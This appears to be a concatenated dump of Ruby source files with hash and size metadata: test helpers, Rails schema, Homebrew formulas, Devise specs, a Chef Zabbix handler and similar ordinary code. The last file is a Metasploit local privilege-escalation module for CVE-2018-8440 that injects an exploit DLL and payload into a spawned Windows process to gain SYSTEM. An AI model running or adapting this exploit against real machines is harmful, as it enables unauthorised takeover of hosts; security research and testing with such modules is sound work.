e98b70a6189c1abb74681c65ac4c5adf16aaae61 | 128 | require 'email_spec'
RSpec.configure do |config|
config.include(EmailSpec::Helpers)
config.include(EmailSpec::Matchers)
end
| 21.333333 | 37 | 0.789063 |
d5c509a75df6f89016cf0e15b43dedfc79b9af42 | 1,349 | # frozen_string_literal: true
# Copyright 2019 OpenTelemetry Authors
#
# SPDX-License-Identifier: Apache-2.0
require 'sinatra'
require 'opentelemetry'
require_relative 'extensions/tracer_extension'
module OpenTelemetry
module Adapters
module Sinatra
class Adapter
class << self
attr_reader :config,
:propagator
def install(config = {})
return :already_installed if installed?
@config = config
@propagator = OpenTelemetry.tracer_factory.http_text_format
new.install
end
def tracer
@tracer ||= OpenTelemetry.tracer_factory.tracer(
Sinatra.name,
Sinatra.version
)
end
attr_accessor :installed
alias_method :installed?, :installed
end
# @return [Symbol] indicating whether the method has already
# been called or not (arbitrary, useful for testing purposes)
def install
return :already_installed if self.class.installed?
self.class.installed = true
register_tracer_extension
:installed
end
private
def register_tracer_extension
::Sinatra::Base.register Extensions::TracerExtension
end
end
end
end
end
| 22.483333 | 71 | 0.606375 |
b96896b129a188aa9d764c6b3c2e897b0d431a7a | 476 | # Write first_pos, a method which takes a string and , returns a hash
# whose keys are all the words in the string, and values are the
# earliest position they were seen in the string.
#
# There will be no punctuation in the strings.
#
# first_pos "The dog and the cat and the cow" # => {"The" => 0, "dog" => 1, "and" => 2, "the" => 3, "cat" => 4, "cow" => 7}
def first_pos(string)
words = {}
string.split(" ").each_with_index { |word, i| words[word] ||= i }
words
end
| 34 | 123 | 0.642857 |
e2d24bdfd9fc63d67c1a64111a6cb816726bebb0 | 2,532 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2017_10_25_101231) do
create_table "admins", force: :cascade do |t|
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "cars", force: :cascade do |t|
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "cities", force: :cascade do |t|
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "drinks", force: :cascade do |t|
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "foods", force: :cascade do |t|
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "marks", force: :cascade do |t|
t.string "marker_type"
t.integer "marker_id"
t.string "markable_type"
t.integer "markable_id"
t.string "mark", limit: 128
t.datetime "created_at"
t.index ["markable_id", "markable_type", "mark"], name: "index_marks_on_markable_id_and_markable_type_and_mark"
t.index ["markable_type", "markable_id"], name: "index_marks_on_markable_type_and_markable_id"
t.index ["marker_id", "marker_type", "mark"], name: "index_marks_on_marker_id_and_marker_type_and_mark"
t.index ["marker_type", "marker_id"], name: "index_marks_on_marker_type_and_marker_id"
end
create_table "superlative_people", force: :cascade do |t|
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "users", force: :cascade do |t|
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
end
| 35.661972 | 115 | 0.720379 |
6a7a5c5d424079549d248a42ac33e371697ed9ae | 3,014 | class ArxLibertatis < Formula
desc "Cross-platform, open source port of Arx Fatalis"
homepage "https://arx-libertatis.org/"
license "GPL-3.0"
revision 2
stable do
url "https://arx-libertatis.org/files/arx-libertatis-1.1.2.tar.xz"
sha256 "82adb440a9c86673e74b84abd480cae968e1296d625b6d40c69ca35b35ed4e42"
# Add a missing include to CMakeLists.txt
patch do
url "https://github.com/arx/ArxLibertatis/commit/442ba4af978160abd3856a9daec38f5b6e213cb4.patch?full_index=1"
sha256 "de361866cc51c14f317a67dcfd3b736160a577238f931c78a525ea2864b1add9"
end
end
livecheck do
url :head
regex(/^v?(\d+(?:\.\d+)+)$/i)
end
bottle do
cellar :any
sha256 "2a9e06b2b91e1133389728b2ad0c81f23d95a266a451144fb8639953b5a96cd3" => :big_sur
sha256 "b93ffc0870dffd0bab99117814e3c094fc019c2315bdd8fc35f687c1009dd661" => :catalina
sha256 "39fc49249e5a82bd067c05bcd056b454a90ace91f364b3c33534901827247b2c" => :mojave
sha256 "2fe2043845655c6f3e75be1dc7213826fd142f806fd7b59006fdef940584e92a" => :high_sierra
end
head do
url "https://github.com/arx/ArxLibertatis.git"
resource "arx-libertatis-data" do
url "https://github.com/arx/ArxLibertatisData.git"
end
end
depends_on "boost" => :build
depends_on "cmake" => :build
depends_on "glm" => :build
depends_on "freetype"
depends_on "glew"
depends_on "innoextract"
depends_on "sdl"
conflicts_with "rnv", because: "both install `arx` binaries"
def install
args = std_cmake_args
# The patches for these aren't straightforward to backport because of
# other changes; these minimal inreplaces get it building.
# HEAD is fine, and the next stable release will contain these changes.
if build.stable?
# https://github.com/arx/ArxLibertatis/commit/39fb9a0e3a6888a6a5f040e39896e88750c89065
inreplace "src/platform/Time.cpp", "clock_t ", "clockid_t "
# Version parsing is broken in the current stable; fixed upstream.
# This hardcodes the current version based on data from VERSION.
inreplace "src/core/Version.cpp.in" do |s|
s.gsub! "${VERSION_COUNT}", "5"
s.gsub! "${VERSION_2}", "10"
s.gsub! "${VERSION_0}", "1.1.2"
s.gsub! "${GIT_SUFFIX_5}", "+Homebrew-1"
s.gsub! "${VERSION_4}", "Rhaa Movis"
end
end
# Install prebuilt icons to avoid inkscape and imagemagick deps
if build.head?
(buildpath/"arx-libertatis-data").install resource("arx-libertatis-data")
args << "-DDATA_FILES=#{buildpath}/arx-libertatis-data"
end
mkdir "build" do
system "cmake", "..", *args
system "make", "install"
end
end
def caveats
<<~EOS
This package only contains the Arx Libertatis binary, not the game data.
To play Arx Fatalis you will need to obtain the game from GOG.com and
install the game data with:
arx-install-data /path/to/setup_arx_fatalis.exe
EOS
end
test do
system "#{bin}/arx", "-h"
end
end
| 31.395833 | 115 | 0.697744 |
3831e65ecad3c14039e443a90c88eec875545581 | 1,856 | require 'yaml'
require 'active_support/concern'
module Geokit
# Contains a class method geocode_ip_address which can be used to enable automatic geocoding
# for request IP addresses. The geocoded information is stored in a cookie and in the
# session to minimize web service calls. The point of the helper is to enable location-based
# websites to have a best-guess for new visitors.
module IpGeocodeLookup
extend ActiveSupport::Concern
# Class method to mix into active record.
module ClassMethods # :nodoc:
def geocode_ip_address(filter_options = {})
if respond_to? :before_action
before_action :store_ip_location, filter_options
else
before_filter :store_ip_location, filter_options
end
end
end
private
# Places the IP address' geocode location into the session if it
# can be found. Otherwise, looks for a geo location cookie and
# uses that value. The last resort is to call the web service to
# get the value.
def store_ip_location
session[:geo_location] ||= retrieve_location_from_cookie_or_service
cookies[:geo_location] = { :value => session[:geo_location].to_yaml, :expires => 30.days.from_now } if session[:geo_location]
end
# Uses the stored location value from the cookie if it exists. If
# no cookie exists, calls out to the web service to get the location.
def retrieve_location_from_cookie_or_service
return GeoLoc.new(YAML.load(cookies[:geo_location])) if cookies[:geo_location]
location = Geocoders::MultiGeocoder.geocode(get_ip_address)
return location.success ? location : nil
end
# Returns the real ip address, though this could be the localhost ip
# address. No special handling here anymore.
def get_ip_address
request.remote_ip
end
end
end
| 37.877551 | 131 | 0.721444 |
33721dbe3c9bd8f8746ea209905967f4ade727c1 | 950 | require "language/haskell"
class Hledger < Formula
include Language::Haskell::Cabal
desc "Command-line accounting tool"
homepage "http://hledger.org"
url "https://hackage.haskell.org/package/hledger-1.10/hledger-1.10.tar.gz"
sha256 "f64420f852502e84dfa9374ace1d00a06ecf1641ad9fd3b22d7c2c48c1d5c4d3"
bottle do
cellar :any_skip_relocation
# sha256 "7d195e01de4bfa26d518d8b85f4df54e591863325db9095dba2061d09982b598" => :mojave
sha256 "4ae8f7b5ff4619b067064183e3939da3cbb62f4cd317803a24ef29d3ae955815" => :high_sierra
sha256 "1ac46662414ced9e4e8949060c5060a8c9e55a9894dc362f59198ce388893184" => :sierra
sha256 "d36fc1aa14f0a5f14dbf4a3bed694a5a9a1d507735ebc6955470c1eae64ff4a4" => :el_capitan
end
depends_on "cabal-install" => :build
depends_on "ghc" => :build
def install
install_cabal_package :using => ["happy"]
end
test do
touch ".hledger.journal"
system "#{bin}/hledger", "test"
end
end
| 30.645161 | 93 | 0.773684 |
61f89daf8d0344ea4a24e773847350451c864571 | 1,825 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "gapic/common"
require "gapic/config"
require "gapic/config/method"
require "google/cloud/ai_platform/v1/version"
require "google/cloud/ai_platform/v1/pipeline_service/credentials"
require "google/cloud/ai_platform/v1/pipeline_service/paths"
require "google/cloud/ai_platform/v1/pipeline_service/operations"
require "google/cloud/ai_platform/v1/pipeline_service/client"
module Google
module Cloud
module AIPlatform
module V1
##
# A service for creating and managing Vertex AI's pipelines. This includes both
# `TrainingPipeline` resources (used for AutoML and custom training) and
# `PipelineJob` resources (used for Vertex Pipelines).
#
# To load this service and instantiate a client:
#
# require "google/cloud/ai_platform/v1/pipeline_service"
# client = ::Google::Cloud::AIPlatform::V1::PipelineService::Client.new
#
module PipelineService
end
end
end
end
end
helper_path = ::File.join __dir__, "pipeline_service", "helpers.rb"
require "google/cloud/ai_platform/v1/pipeline_service/helpers" if ::File.file? helper_path
| 34.433962 | 90 | 0.731507 |
084f976e1b06e477e28add3df6ef88bb661e6fa5 | 1,392 | require 'rubygems'
require 'chef/log'
require 'chef'
require 'tempfile'
module Zabbix
class Report < Chef::Handler
def report
Chef::Log.info "Zabbix::Report handler started"
prefix = "custom.chef-client.last_run"
file = Tempfile.new('client-handler-zabbix-report')
host_name = node[:zabbix][:agent][:hostname] || node[:fqdn]
message = [
"#{host_name} #{prefix}.success #{run_status.success? ? 1 : 0}",
"#{host_name} #{prefix}.elapsed_time #{run_status.elapsed_time}",
"#{host_name} #{prefix}.start_time #{run_status.start_time.to_i}",
"#{host_name} #{prefix}.end_time #{run_status.end_time.to_i}",
"#{host_name} #{prefix}.all_resources_num #{run_status.all_resources.length}",
"#{host_name} #{prefix}.updated_resources_num #{run_status.updated_resources.length}",
].join("\n")
file.write(message)
file.close()
cmd = [File.join(node['zabbix']['bin_dir'], "zabbix_sender"), "--config", File.join(node['zabbix']['etc_dir'], "zabbix_agentd.conf"), "--input-file", file.path]
Chef::Log.debug "Sending to zabbix: #{message}"
Chef::Log.debug "Command #{cmd.join(" ")}"
if RUBY_VERSION < "1.9"
out = IO.popen(cmd.join(" "))
else
out = IO.popen(cmd)
end
Chef::Log.debug "output #{out.readlines}"
out.close
end
end
end
| 34.8 | 166 | 0.619253 |
ed1317d1760d0146c667d1ea484b0aee7b279a6f | 992 | {
matrix_id: '1211',
name: 't3dl_e',
group: 'Oberwolfach',
description: 'Oberwolfach: micropyros thruster, E matrix',
author: 'E. Rudnyi',
editor: 'E. Rudnyi',
date: '2004',
kind: 'duplicate model reduction problem',
problem_2D_or_3D: '1',
num_rows: '20360',
num_cols: '20360',
nonzeros: '20360',
num_explicit_zeros: '0',
num_strongly_connected_components: '20360',
num_dmperm_blocks: '20360',
structural_full_rank: 'true',
structural_rank: '20360',
pattern_symmetry: '1.000',
numeric_symmetry: '1.000',
rb_type: 'real',
structure: 'symmetric',
cholesky_candidate: 'yes',
positive_definite: 'yes',
norm: '2.163773e-06',
min_singular_value: '3.587500e-10',
condition_number: '6.031422e+03',
svd_rank: '20360',
sprank_minus_rank: '0',
null_space_dimension: '0',
full_numerical_rank: 'yes',
image_files: 't3dl_e.png,t3dl_e_dmperm.png,t3dl_e_svd.png,t3dl_e_graph.gif,',
}
| 29.176471 | 81 | 0.654234 |
5db3569b47521aee7b2ff4697d398661db839389 | 141 | require 'rails_helper'
RSpec.describe CourseClassesTrainer, :type => :model do
pending "add some examples to (or delete) #{__FILE__}"
end
| 23.5 | 56 | 0.751773 |
bf3166d1c01f8d5ef7407503bf16eeb89c1811f1 | 21,425 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe Devise::Models::G5Authenticatable do
subject { model }
let(:model_class) { User }
let(:model) { model_class.new(attributes) }
let(:attributes) { {} }
describe '#save!' do
subject(:save) { model.save! }
context 'when model is new' do
let(:attributes) do
{ email: email,
password: password,
password_confirmation: password_confirmation,
provider: provider,
uid: uid,
current_password: current_password,
updated_by: updated_by }
end
let(:email) { '[email protected]' }
let(:password) { 'my_secret' }
let(:password_confirmation) { password }
let(:current_password) { 'my_current_password' }
let(:provider) {}
let(:uid) {}
let(:updated_by) { model_class.new }
let(:auth_user_creator) { double(:auth_user_creator, create: auth_user) }
let(:auth_user) { double(:auth_user, id: auth_id) }
let(:auth_id) { 1 }
before do
allow(Devise::G5::AuthUserCreator).to receive(:new)
.and_return(auth_user_creator)
end
context 'when model is valid' do
before { save }
it 'should persist the email' do
expect(model_class.find(model.id).email).to eq(email)
end
it 'should not persist the password' do
expect(model_class.find(model.id).password).to be_nil
end
it 'should not persist the password_confirmation' do
expect(model_class.find(model.id).password_confirmation).to be_nil
end
it 'should not persist the current_password' do
expect(model_class.find(model.id).current_password).to be_nil
end
it 'should not persist updated by' do
expect(model_class.find(model.id).updated_by).to be_nil
end
it 'should initialize a service class for creating auth users' do
expect(Devise::G5::AuthUserCreator).to have_received(:new).with(model)
end
it 'should create an auth user' do
expect(auth_user_creator).to have_received(:create)
end
end
context 'when uid is an integer' do
let(:uid) { 42 }
it 'should not raise an error' do
expect { save }.to_not raise_error
end
end
context 'when there is an error creating the auth user' do
before do
allow(auth_user_creator).to receive(:create).and_raise(error)
end
context 'with OAuth2::Error' do
let(:error) { OAuth2::Error.new(response) }
let(:response) do
double(:response, :parsed => error_hash,
:body => error_body,
:error= => nil)
end
let(:error_hash) do
{ 'error' => error_code,
'error_description' => error_description }
end
let(:error_code) { "Email can't be blank" }
let(:error_description) { 'Validation failed' }
let(:error_body) { 'problems' }
it 'should raise a RecordNotSaved error with the OAuth error code' do
expect { save }.to raise_error(ActiveRecord::RecordNotSaved,
error_code)
end
end
context 'with some other error' do
let(:error) { StandardError.new(error_message) }
let(:error_message) { 'problems' }
it 'should raise a RecordNotSaved error' do
expect { save }.to raise_error(ActiveRecord::RecordNotSaved,
error_message)
end
end
end
end
context 'when model is updated' do
let(:model) { create(:user) }
let(:auth_user_updater) { double(:user_updater, update: auth_user) }
let(:auth_user) { double(:auth_user, id: auth_id) }
let(:auth_id) { 'remote-auth-id-42' }
before do
allow(Devise::G5::AuthUserUpdater).to receive(:new)
.and_return(auth_user_updater)
end
context 'with successful auth user update' do
before { save }
it 'should initialize the auth user updater' do
expect(Devise::G5::AuthUserUpdater).to have_received(:new).with(model)
end
it 'should update the auth user' do
expect(auth_user_updater).to have_received(:update)
end
end
context 'with unsuccessful auth user update' do
before do
allow(auth_user_updater).to receive(:update).and_raise(error_message)
end
let(:error_message) { 'problems' }
it 'should raise an error' do
expect { save }.to raise_error(error_message)
end
end
end
end
describe '#update_with_password' do
subject { update_with_password }
let(:update_with_password) { model.update_with_password(params) }
let(:model) { create(:user) }
let(:params) do
{ current_password: current_password,
password: updated_password,
password_confirmation: updated_password,
email: updated_email }
end
let(:current_password) {}
let(:updated_password) { 'updated_secret' }
let(:updated_email) { '[email protected]' }
let(:auth_updater) { double(:auth_user_updater, update: true) }
before do
allow(Devise::G5::AuthUserUpdater).to receive(:new)
.and_return(auth_updater)
end
let(:password_validator) { double(:auth_password_validator) }
before do
allow(Devise::G5::AuthPasswordValidator)
.to receive(:new)
.and_return(password_validator)
end
context 'with valid current password' do
before do
allow(password_validator).to receive(:valid_password?).and_return(true)
end
before { update_with_password }
context 'with valid input' do
it 'should return true' do
expect(update_with_password).to be_truthy
end
it 'should initialize the auth user updater' do
expect(Devise::G5::AuthUserUpdater).to have_received(:new).with(model)
end
it 'should update the credentials in the auth server' do
expect(auth_updater).to have_received(:update)
end
it 'should update the email on the local model' do
expect(model.email).to eq(updated_email)
end
end
context 'when there is a validation error' do
let(:updated_email) { '' }
it 'should return false' do
expect(update_with_password).to be_falsey
end
it 'should not update the credentials on the auth server' do
expect(auth_updater).to_not have_received(:update)
end
it 'should add an error to the email attribute' do
expect(model.errors[:email].count).to eq(1)
end
end
end
context 'with invalid current password' do
before do
allow(password_validator).to receive(:valid_password?).and_return(false)
end
before { update_with_password }
context 'when current password is missing' do
let(:current_password) { '' }
it 'should return false' do
expect(update_with_password).to be_falsey
end
it 'should set an error on the current_password attribute' do
expect(model.errors[:current_password]).to include("can't be blank")
end
it 'should not update user credentials in the remote server' do
expect(auth_updater).to_not have_received(:update)
end
end
context 'when current password is incorrect' do
let(:current_password) { 'something wrong' }
it 'should return false' do
expect(update_with_password).to be_falsey
end
it 'should set an error on the current_password attribute' do
expect(model.errors[:current_password]).to include('is invalid')
end
it 'should not update user credentials in the remote server' do
expect(auth_updater).to_not have_received(:update)
end
end
end
end
describe '#clean_up_passwords' do
subject(:clean_up_passwords) { model.clean_up_passwords }
let(:model) do
build_stubbed(:user, password: password,
password_confirmation: password)
end
let(:password) { 'foobarbaz' }
it 'should change the password to nil' do
expect { clean_up_passwords }
.to change { model.password }
.from(password).to(nil)
end
it 'should change the password_confirmation to nil' do
expect { clean_up_passwords }
.to change { model.password_confirmation }
.from(password).to(nil)
end
end
describe '#valid_password?' do
subject(:valid_password?) { model.valid_password?(password) }
let(:model) { create(:user) }
let(:password) { 'foobarbaz' }
let(:password_validator) do
double(:password_validator, valid_password?: valid)
end
before do
allow(Devise::G5::AuthPasswordValidator).to receive(:new)
.and_return(password_validator)
end
before { valid_password? }
context 'when password is valid' do
let(:valid) { true }
it 'should return true' do
expect(valid_password?).to be_truthy
end
it 'should initialize the validator with the model' do
expect(Devise::G5::AuthPasswordValidator).to have_received(:new)
.with(model)
end
it 'should check the password against the auth server' do
expect(password_validator).to have_received(:valid_password?)
.with(password)
end
end
context 'when password is invalid' do
let(:valid) { false }
it 'should return false' do
expect(valid_password?).to be_falsey
end
it 'should initialize the validator with the model' do
expect(Devise::G5::AuthPasswordValidator).to have_received(:new)
.with(model)
end
it 'should check the password against the auth server' do
expect(password_validator).to have_received(:valid_password?)
.with(password)
end
end
end
describe '.find_and_update_for_g5_oauth' do
subject(:find_and_update) do
model_class.find_and_update_for_g5_oauth(auth_data)
end
let(:auth_data) do
OmniAuth::AuthHash.new(provider: 'g5',
uid: '123999',
info: { name: 'Foo Bar',
email: '[email protected]' },
credentials: { token: 'abc123' })
end
context 'when model exists' do
let!(:model) do
create(:user, provider: auth_data['provider'],
uid: auth_data['uid'],
g5_access_token: 'old_token')
end
it 'should return the model' do
expect(find_and_update).to eq(model)
end
it 'should save the updated g5_access_token' do
find_and_update
model.reload
expect(model.g5_access_token).to eq(auth_data.credentials.token)
end
it 'should save the updated email' do
find_and_update
model.reload
expect(model.email).to eq(auth_data.info.email)
end
it 'executes the callback to update role data' do
expect_any_instance_of(model_class).to receive(:update_roles_from_auth)
.with(auth_data)
find_and_update
end
end
context 'when model does not exist' do
it 'should return nothing' do
expect(find_and_update).to be_nil
end
it 'does not execute the callback to update role data' do
expect_any_instance_of(model_class)
.to_not receive(:update_roles_from_auth)
find_and_update
end
end
end
describe '.find_for_g5_oauth' do
subject(:find_for_g5_oauth) { model_class.find_for_g5_oauth(auth_data) }
let(:auth_data) do
OmniAuth::AuthHash.new(provider: 'g5',
uid: uid,
info: { name: 'Foo Bar',
email: '[email protected]' },
credentials: { token: 'abc123' })
end
context 'when model exists' do
let!(:model) do
create(:user, email: '[email protected]',
provider: auth_data.provider,
uid: uid.to_s)
end
context 'when auth data uid is an integer' do
let(:uid) { 42 }
it 'should return the model' do
expect(find_for_g5_oauth).to eq(model)
end
it 'should not create any new models' do
expect { find_for_g5_oauth }.to_not change { model_class.count }
end
end
context 'when auth data uid is a string' do
let(:uid) { 'some/crazy/string1234#id' }
it 'should return the model' do
expect(find_for_g5_oauth).to eq(model)
end
it 'should not create any new models' do
expect { find_for_g5_oauth }.to_not change { model_class.count }
end
end
end
context 'given a model with invalid arguments' do
let(:uid) { 42 }
context 'having an un-existing uid' do
let!(:model) do
create(:user, email: '[email protected]',
provider: auth_data.provider,
uid: 0)
end
it 'finds the record by email address' do
expect(find_for_g5_oauth).to eq(model)
end
end
context 'having an un-existing uid' do
let!(:model) do
create(:user, email: '[email protected]',
provider: auth_data.provider,
uid: 0)
end
it 'finds the record by email address' do
expect(find_for_g5_oauth).to eq(model)
end
end
end
context 'when model does not exist' do
let(:uid) { '42' }
it 'should not return anything' do
expect(find_for_g5_oauth).to be_nil
end
it 'should not create any new models' do
expect { find_for_g5_oauth }.to_not change { model_class.count }
end
end
end
describe '#update_g5_credentials' do
subject(:update_g5_credentials) { model.update_g5_credentials(auth_data) }
let(:auth_data) do
OmniAuth::AuthHash.new(provider: 'g5',
uid: '123999',
info: { name: 'Foo Bar',
email: '[email protected]' },
credentials: { token: 'abc123' })
end
let(:model) do
create(:user, provider: auth_data['provider'],
uid: auth_data['uid'],
g5_access_token: 'old_token')
end
it 'should update the g5_access_token' do
expect { update_g5_credentials }.to change { model.g5_access_token }
.to(auth_data.credentials.token)
end
it 'should not save the changes' do
update_g5_credentials
expect(model.g5_access_token_changed?).to be_truthy
end
end
describe '#revoke_g5_credentials!' do
subject(:revoke_g5_credentials!) { model.revoke_g5_credentials! }
let(:auth_updater) { double(:auth_user_updater, update: nil) }
before do
allow(Devise::G5::AuthUserUpdater).to receive(:new)
.and_return(auth_updater)
end
let(:model) { create(:user, g5_access_token: g5_token) }
before { model.password = model.password_confirmation = nil }
context 'when there is a g5 token' do
let(:g5_token) { 'my_g5_token' }
it 'should reset the g5 token' do
revoke_g5_credentials!
expect(model.g5_access_token).to be_nil
end
it 'should save the changes' do
revoke_g5_credentials!
expect { model.reload }.to_not change { model.g5_access_token }
end
end
context 'when there is no g5 token' do
let(:g5_token) {}
it 'should not set the g5 token' do
revoke_g5_credentials!
expect(model.g5_access_token).to be_nil
end
end
end
describe '#new_with_session' do
subject(:new_with_session) { model_class.new_with_session(params, session) }
let(:auth_data) do
OmniAuth::AuthHash.new(provider: 'g5',
uid: '123999',
info: { name: 'Foo Bar',
email: '[email protected]' },
credentials: { token: 'abc123' })
end
before do
allow_any_instance_of(model_class).to receive(:update_roles_from_auth)
end
context 'with params' do
let(:params) do
{ 'email' => email_param }
end
let(:email_param) { '[email protected]' }
context 'with session data' do
let(:session) { { 'omniauth.auth' => auth_data } }
it { is_expected.to be_new_record }
it 'should set the email from the params' do
expect(new_with_session.email).to eq(email_param)
end
it 'should set the provider from the session' do
expect(new_with_session.provider).to eq(auth_data.provider)
end
it 'should set the uid from the session' do
expect(new_with_session.uid).to eq(auth_data.uid)
end
it 'executes the callback to update role data' do
expect(new_with_session).to have_received(:update_roles_from_auth)
.with(auth_data)
end
end
context 'without session data' do
let(:session) { {} }
it { is_expected.to be_new_record }
it 'should set the email from the params' do
expect(new_with_session.email).to eq(email_param)
end
it 'should not set the provider' do
expect(new_with_session.provider).to be_nil
end
it 'should not set the uid' do
expect(new_with_session.uid).to be_nil
end
it 'should not execute the callback to update role data' do
expect_any_instance_of(model_class)
.not_to receive(:update_roles_from_auth)
new_with_session
end
end
end
context 'without params' do
let(:params) { {} }
context 'with session data' do
let(:session) do
{ 'omniauth.auth' => auth_data }
end
it { is_expected.to be_new_record }
it 'should set the email from the session' do
expect(new_with_session.email).to eq(auth_data.info[:email])
end
it 'should set the provider from the session' do
expect(new_with_session.provider).to eq(auth_data.provider)
end
it 'should set the uid from the session' do
expect(new_with_session.uid).to eq(auth_data.uid)
end
it 'executes the callback to update role data' do
expect(new_with_session).to have_received(:update_roles_from_auth)
.with(auth_data)
end
end
context 'without session data' do
let(:session) { {} }
it { is_expected.to be_new_record }
it 'should not set the email' do
expect(new_with_session.email).to be_blank
end
it 'should not set the provider' do
expect(new_with_session.provider).to be_nil
end
it 'should not set the uid' do
expect(new_with_session.uid).to be_nil
end
it 'does not execute the callback to update role data' do
expect_any_instance_of(model_class)
.not_to receive(:update_roles_from_auth)
new_with_session
end
end
end
end
describe '#attributes_from_auth' do
subject(:attributes_from_auth) { model.attributes_from_auth(auth_data) }
let(:auth_data) do
OmniAuth::AuthHash.new(provider: 'g5',
uid: '123999',
info: { first_name: 'Foo',
last_name: 'Bar',
email: '[email protected]',
phone: '123-555-1212 x42' },
credentials: { token: 'abc123' },
extra: { title: 'Minister of Funny Walks',
organization_name: 'Sales' })
end
it 'has the correct uid' do
expect(attributes_from_auth[:uid]).to eq(auth_data.uid)
end
it 'has the correct provider' do
expect(attributes_from_auth[:provider]).to eq(auth_data.provider)
end
it 'has the correct email' do
expect(attributes_from_auth[:email]).to eq(auth_data.info.email)
end
end
describe '#update_roles_from_auth' do
subject(:update_roles) { model.update_roles_from_auth(auth_data) }
let(:auth_data) do
OmniAuth::AuthHash.new(provider: 'g5',
uid: '123456',
extra: { roles: [
{ name: 'Admin',
type: 'GLOBAL',
urn: nil }
] })
end
it 'does not change anything on the model' do
expect { update_roles }.to_not change { model }
end
end
end
| 29.756944 | 80 | 0.585811 |
1df4352d66d3f890ceef7d701d69dbe3054a9a48 | 5,218 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/post/file'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/registry' #TODO: Do we need this?
require 'msf/core/exploit/exe'
class MetasploitModule < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Post::Windows::Priv
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Windows ALPC Task Scheduler Local Privilege Elevation',
'Description' => %q(
On vulnerable versions of Windows the alpc endpoint method SchRpcSetSecurity implemented
by the task scheduler service can be used to write arbitrary DACLs to `.job` files located
in `c:\windows\tasks` because the scheduler does not use impersonation when checking this
location. Since users can create files in the `c:\windows\tasks` folder, a hardlink can be
created to a file the user has read access to. After creating a hardlink, the vulnerability
can be triggered to set the DACL on the linked file.
WARNING:
The PrintConfig.dll (%windir%\system32\driverstor\filerepository\prnms003*) on the target host
will be overwritten when the exploit runs.
This module has been tested against Windows 10 Pro x64.
),
'License' => MSF_LICENSE,
'Author' =>
[
'SandboxEscaper', # Original discovery and PoC
'bwatters-r7', # msf module
'asoto-r7', # msf module
'Jacob Robles' # msf module
],
'Platform' => 'win',
'SessionTypes' => ['meterpreter'],
'Targets' =>
[
['Windows 10 x64', { 'Arch' => ARCH_X64 }]
],
'References' =>
[
['CVE', '2018-8440'],
['URL', 'https://github.com/SandboxEscaper/randomrepo/'],
],
'DisclosureDate' => 'Aug 27 2018',
'DefaultTarget' => 0,
))
register_options([OptString.new('PROCESS',
[false, 'Name of process to spawn and inject dll into.', nil])
])
end
def setup_process(process_name)
begin
print_status("Launching #{process_name} to host the exploit...")
launch_process = client.sys.process.execute(process_name, nil, 'Hidden' => true)
process = client.sys.process.open(launch_process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError
# Sandboxes could not allow to create a new process
# stdapi_sys_process_execute: Operation failed: Access is denied.
print_error('Operation failed. Trying to elevate the current process...')
process = client.sys.process.open
end
process
end
def inject_magic(process, payload_dll)
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8440', 'ALPC-TaskSched-LPE.dll')
library_path = ::File.expand_path(library_path)
dll_data = ''
::File.open(library_path, 'rb') { |f| dll_data = f.read }
print_status("Writing payload dll into process #{process.pid} memory")
payload_addr = process.memory.allocate(payload_dll.length, PROT_READ | PROT_WRITE)
written = process.memory.write(payload_addr, payload_dll)
if written != payload_dll.length
fail_with(Failure::UnexpectedReply, 'Failed to write payload to process memory')
end
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
exploit_mem, offset = inject_dll_data_into_process(process, dll_data)
process.thread.create(exploit_mem + offset, payload_addr)
end
def validate_active_host
sysinfo['Computer']
true
rescue Rex::Post::Meterpreter::RequestError, Rex::TimeoutError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
false
end
def validate_target
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
if sysinfo['Architecture'] == ARCH_X86
fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
end
if sysinfo['OS'] =~ /XP/
fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
end
end
def exploit
unless session.type == 'meterpreter'
fail_with(Failure::None, 'Only meterpreter sessions are supported')
end
payload_dll = generate_payload_dll
process_name = datastore['PROCESS'] || 'notepad.exe'
print_status('Checking target...')
unless validate_active_host
raise Msf::Exploit::Failed, 'Could not connect to session'
end
validate_target
print_status("Target Looks Good... trying to start #{process_name}")
process = setup_process(process_name)
inject_magic(process, payload_dll)
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
print_error(e.message)
end
end
| 36.48951 | 113 | 0.665006 |
